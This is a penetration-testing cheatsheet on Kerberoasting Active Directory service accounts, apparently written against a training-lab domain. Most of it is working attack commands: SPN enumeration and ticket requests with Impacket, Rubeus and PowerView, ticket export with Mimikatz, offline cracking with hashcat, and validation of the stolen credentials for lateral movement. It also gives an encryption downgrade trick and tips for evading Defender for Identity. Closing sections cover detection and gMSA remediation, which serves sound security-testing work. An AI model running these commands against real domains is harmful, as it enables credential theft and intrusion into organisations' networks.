๐ก๏ธ Methodology Checklist
- Identify SPN accounts:
Get-DomainUser -SPNorimpacket-GetUserSPNs [DOMAIN]/[USER]:[PASS] -dc-ip [DC_IP] - Request TGS tickets:
-requestflag with GetUserSPNs - From Windows (Rubeus):
Rubeus.exe kerberoast /outfile:hashes.txt /nowrap - Crack:
hashcat -m 13100 hashes.txt [wordlist] - Check cracked accounts for admin group membership
- Use cracked credentials for further enumeration or lateral movement
- Document Kerberoastable accounts and cracked passwords in report
๐ฏ Operational Context
Use when: Any domain user credentials available โ request TGS tickets for service accounts and crack offline for plaintext passwords.
Think Dumber First: impacket-GetUserSPNs [DOMAIN]/[USER]:[PASS] -dc-ip [DC] -request -outputfile kerberoast.hashes โ 30 seconds. Every service account SPN is a Kerberoasting target. Weak service account passwords crack in minutes.
Skip when: All service accounts use gMSA (Group Managed Service Accounts) โ gMSA passwords are 240-char random and uncrackable.
โก Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
GetUserSPNs.py -dc-ip [DC_IP] [DOMAIN]/[USER] | Enumerate all SPN accounts (Kerberoastable targets) |
GetUserSPNs.py -dc-ip [DC_IP] [DOMAIN]/[USER] -request-user [SPN_ACCOUNT] -outputfile spn_hash.txt | Request TGS for specific account, save in Hashcat format |
GetUserSPNs.py -dc-ip [DC_IP] [DOMAIN]/[USER] -request -outputfile all_spn_hashes.txt | Request TGS for ALL SPN accounts (noisy) |
hashcat -m 13100 spn_hash.txt /usr/share/wordlists/rockyou.txt | Crack RC4 TGS ticket (etype 23) |
hashcat -m 19700 spn_hash.txt /usr/share/wordlists/rockyou.txt | Crack AES-256 TGS ticket (etype 18) |
sudo nxc smb [DC_IP] -u [SPN_ACCOUNT] -p '[CRACKED_PASS]' | Validate cracked SPN credentials |
.\Rubeus.exe kerberoast /stats | Enumerate SPN accounts + encryption type stats |
.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap | Roast only privileged accounts (admincount=1) |
.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap /tgtdeleg | Downgrade AES accounts to RC4 for faster cracking |
Get-DomainUser * -spn | select samaccountname | PowerView โ list all SPN accounts |
Get-DomainUser -Identity [USER] | Get-DomainSPNTicket -Format Hashcat | PowerView โ extract TGS in Hashcat format |
mimikatz # base64 /out:true | Set Mimikatz to output tickets as Base64 |
mimikatz # kerberos::list /export | Export all cached tickets |
echo "[BASE64]" | tr -d \\n | base64 -d > target.kirbi | Decode Base64 ticket to kirbi file |
python2.7 kirbi2john.py target.kirbi | Convert kirbi to John/Hashcat format |
sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > final_hash.txt | Fix kirbi2john output formatting for Hashcat |
๐ฌ Deep Dive & Workflow
How Kerberoasting Works
Any authenticated domain user can request a TGS ticket for any account with an SPN set. The TGS-REP is encrypted with the service accountโs NTLM hash โ extract the ticket and crack it offline. No elevated privileges required to request.
Target profile: SPN accounts are often highly privileged (local admin, DA) and frequently have weak passwords (matching username, seasonal patterns). Even without admin rights, a cracked MSSQL SPN = sysadmin on the database.
Reporting caveat: If tickets are extracted but cannot be cracked due to strong passwords, still report the finding โ downgrade severity to Medium if strong password policy mitigates it.
Linux Attack Path (Impacket)
# 1. Enumerate Kerberoastable accounts โ review MemberOf column for high-value targets
GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend
# 2. Request ticket for specific target (preferred โ targeted = stealthy)
GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request-user sqldev -outputfile sqldev_hash.txt
# 3. Crack
hashcat -m 13100 sqldev_hash.txt /usr/share/wordlists/rockyou.txt
# 4. Validate
sudo nxc smb 172.16.5.5 -u sqldev -p 'database!'Warning: -request without -request-user dumps tickets for every SPN account. Extremely noisy โ avoid in monitored environments.
Windows Attack Path โ Rubeus
# Survey: how many targets? what encryption types?
.\Rubeus.exe kerberoast /stats
# Targeted: only admincount=1 accounts (privilege tier)
# /nowrap prevents Base64 corruption from console line-wrapping
.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap
# Downgrade AES โ RC4 for faster cracking
.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap /tgtdelegDowngrade limit: /tgtdeleg does NOT work against Windows Server 2019+ DCs โ they enforce highest supported encryption type.
Windows Attack Path โ PowerView (When Rubeus Is Blocked)
Import-Module .\PowerView.ps1
Get-DomainUser * -spn | select samaccountname
Get-DomainUser -Identity sqldev | Get-DomainSPNTicket -Format HashcatManual Route โ Mimikatz + kirbi2john
# Request ticket into memory
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DEV-PRE-SQL.inlanefreight.local:1433"
# Extract with Mimikatz
mimikatz # base64 /out:true
mimikatz # kerberos::list /exportOn Linux attack host:
echo "[BASE64_BLOB]" | tr -d \\n | base64 -d > target.kirbi
python2.7 kirbi2john.py target.kirbi
sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > final_hash.txt
hashcat -m 13100 final_hash.txt /usr/share/wordlists/rockyou.txtEncryption Type Quick Reference
| Mode | Type | Notes |
|---|---|---|
| 13100 | RC4 (etype 23) | Default, fastest to crack |
| 19700 | AES-256 (etype 18) | Slower; try /tgtdeleg downgrade first |
Detection
Event ID 4769 (Kerberos service ticket requested) with Encryption Type 0x17 (RC4). Defenders monitor for anomalous spikes from a single account. Targeted requests (-request-user) generate far less noise than bulk dumps.
๐ ๏ธ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| GetUserSPNs returns no SPNs | No service accounts with SPNs | Confirm domain accounts: ldapsearch -x ... '(&(objectClass=user)(servicePrincipalName=*))' |
| TGS hash returns KDC_ERR_S_PRINCIPAL_UNKNOWN | SPN deleted or object moved | SPN exists in BloodHound but account moved; re-enumerate current SPNs |
| hashcat mode 13100 too slow | AES256 Kerberoast hash | Request RC4 hash: GetUserSPNs ... -request-user [SVC] -dc-ip [DC] โ RC4 cracks faster (mode 13100 works for both) |
| Cracking fails โ password too strong | Service account with 20+ char random password | Move to next target; some orgs use LAPS-like randomization for service accounts |
| Kerberoasting detected by MDI | MDI monitors TGS requests | Use nxc module which limits requests; or target specific accounts not bulk-request all |
๐ Reporting Trigger
Finding Title: Kerberoastable Service Account Password Cracked Impact: Service account TGS ticket cracking recovers the service account plaintext password offline without authentication failures, providing credentials for lateral movement or privilege escalation depending on the service accountโs AD permissions. Root Cause: Service account using a weak human-memorable password instead of a long random managed password. No detection of bulk TGS requests. Recommendation: Implement Group Managed Service Accounts (gMSA) for all service accounts to enforce automatic 240-character random password rotation. Alert on bulk TGS requests via Microsoft Defender for Identity. Audit all SPN-bearing accounts for excessive AD permissions.